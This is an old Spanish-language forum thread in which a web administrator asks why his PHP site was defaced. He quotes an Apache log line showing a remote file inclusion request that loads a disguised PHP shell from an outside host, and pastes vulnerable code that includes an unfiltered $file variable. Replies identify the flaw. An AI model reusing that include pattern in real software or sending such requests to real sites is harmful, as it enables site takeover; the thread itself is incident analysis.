Banda Ancha EU

Comunidad de usuarios
de fibra, móvil y ADSL

hosting en interdominios
227 lecturas y 8 respuestas
  • Cerrado

    [Editado]

    Defaced a mi web

    Esta tarde me han hecho un defaced a la web q administro en mi trabajo (bueno una de mis webs)

    Los logs de apache muestran esta linea entre otras muchas del hacker, pero esta es la importante:

    200.209.52.2 - - [20/Apr/2005:15:46:04 +0200] "GET /seminario/index.php?file=www.markuswalter.net/lauftreff/cmd2.jpg?…\\index.html HTTP/1.0" 200 10229

    La IP q sale es la del hacker, asi q no intenteis nada si creeis q es mi servidor.

    Por lo que veo, es que me han colado un script en php (es el cmd2.jpg) a traves del index.php de y luego me han sustituido, el index.html de otra web q esta en otro directorio.

    Lo que pasa es que no veo donde esta el fallo en mi index.php (por donde me consiguieron ejecutar el script)

    Os pongo el codigo del index.php a ver si alguien me puede ayudar donde esta el fallo

    require_once("includes/config.php");
    
     require_once("includes/library.php");
    
     if (empty($file)) {$file=$home_page;}
    
     echo "
    
     \n
    
     \n
    
     ";
    
     if (!$printable) {
    
     echo "\n";
    
     header_page(); echo "";
    
     }
    
     echo "\n \n";
    
     if (!$printable) {
    
     echo "\n";
    
     open_menu ($menu3_title,$menu3_folder,$menu3_txt,$menu3_size,$menu3_type); echo "";
    
     open_menu ($menu2_title,$menu2_folder,$menu2_txt,$menu2_size,$menu2_type);
    
     /* echo "

    Convalidación por créditos de libre configuración

    ";*/
    
     echo "
    
     \n
    
     \n
    
     ";
    
     open_menu_plane ($menu1_title,$menu1_folder,$menu1_txt,$menu1_size,$menu1_type);
    
     }
    
     if (!$printable) { $view_td="yes"; } else { $view_td="no";}
    
     // Cuerpo de la web.. aqui se hace un include del fichero a mostrar en su hueco correspondiente
    
     if ($view_td=="yes") { // Mostramos o no el enlace Versión Imprimible
    
     $td_print="

    Versión imprimible

     ";
    
     } else {
    
     $td_print="";
    
     }
    
     if (!$menu_name) {$menu_name="$welcome"; $td_print="";}
    
     echo "
    
     ";
    
     if (!$table) {
    
     echo "
    
     $menu_name
    
     ";
    
     }
    
     echo "
    
     $td_print
    
     ";
    
     include($file);
    
     echo "
    
     ";
    
     echo "
    
     \n
    
     \n
    
     \n
    
     \n
    
     \n
    
     ";
    
     ?>

    Veo que los echo's no salen, de todas formas no creo que el fallo este en ellos, simplemente contienen html. De todas formas os cuelgo el fichero index.zip

    Gracias

    Este tema es antiguo y puede contener información obsoleta. Abre un nuevo tema para publicar tu mensaje.
      • Cerrado

        Gracias. Algo asi queria hacer mientras encontraba el error.…

        Gracias.
        Algo asi queria hacer mientras encontraba el error.

        Pero lo que pasa es que tiene que estar mal en algun sitio, si estuviera bien hecho no hubieran podido entrar.
        He leido esto en un foro a otra persona que le ha pasado:

        The web-site that got defaced was running an include which included an unescaped GET variable

        pero en mi caso creo que este no es mi error ¿o si?

        De todas formas parece que el grupo este "Dominus Vis" ha hecho un defaced masivo hoy en muchas webs europeas.

        • Cerrado

          [Editado]

          No me has comentado ke SO corres, pero si tienes windows kiza…

          No me has comentado ke SO corres, pero si tienes windows kiza este enlace te sake de sospechas xD

          msmvps.com/donna/archive/2004/12/22/26733.aspx

          La ultima parcheada es la 5.0.3, es que esto del software de codigo libre tiene estas cosillas, enseguida salen nuevos bugs, que por consiguiente son parcheados rapidamente ;)

          Perdoneme usted, pero creo que este otro enlace, te ayudara muchisimo tambien si miras el script que te subieron al servidor:

          www.securiteam.com/windowsntfocus/6M00K0AC1I.html

          Es el bug del anterior articulo, desarrollado y explicado (en ingles sorry).

          • Cerrado

            Tranquilo por el ingles no tengo ningun problema y gracias.…

            Tranquilo por el ingles no tengo ningun problema y gracias.

            Si tengo un Windows, el windows XP. Exactamente en el pc esta instalado:

            + apache 2.0.50
            + MYSQL Stable 4.0.20d
            + php 5
            + phpmyadmin 2.6.x

            Con el Zone Alarm y el McAfee con sus licencias (son los que tienen la universidad con licencias corporativas) De todas formas puedo instalar cualquier software libre, por si me recomendais alguno que lo sustituya.
            Aparte quiero instalar el cygwin, servidor de SSH, el cual ya he trasteado en mi propio pc. Y creo que a parte de FireFox ya no hay ningun otro software.

            Bueno se esta haciendo tarde, mañana ya me empollare las webs que me has dado.

            Y gracias

            • Cerrado

              Realmente lo unico ke veo que habria que cambiar es el php…

              Realmente lo unico ke veo que habria que cambiar es el php 5.0.0, que deverias pasarlo a 5.0.3. Todo lo demas es altamente correcto, y en mi opinion la mejor de las combinaciones (lastimita del windows XP xDD pero tampoco esta tan mal... aunque a algunos les duela.)

              Estuve mirando los enlaces k te deje y seguramente han explotado ese bug en tu servidor, aparte del filtrado de argumentos que comentan por aqui abajo.

    • Cerrado

      [Editado]

      es un ataque del tipo file inclusion remote. Fijate en el…

      es un ataque del tipo file inclusion remote. Fijate en el include que haces, incluye lo que contenga la variable $file, si no la filtras bien se puede incluir un script en otro server externo y lo que sigue por desgracia ia lo conoces.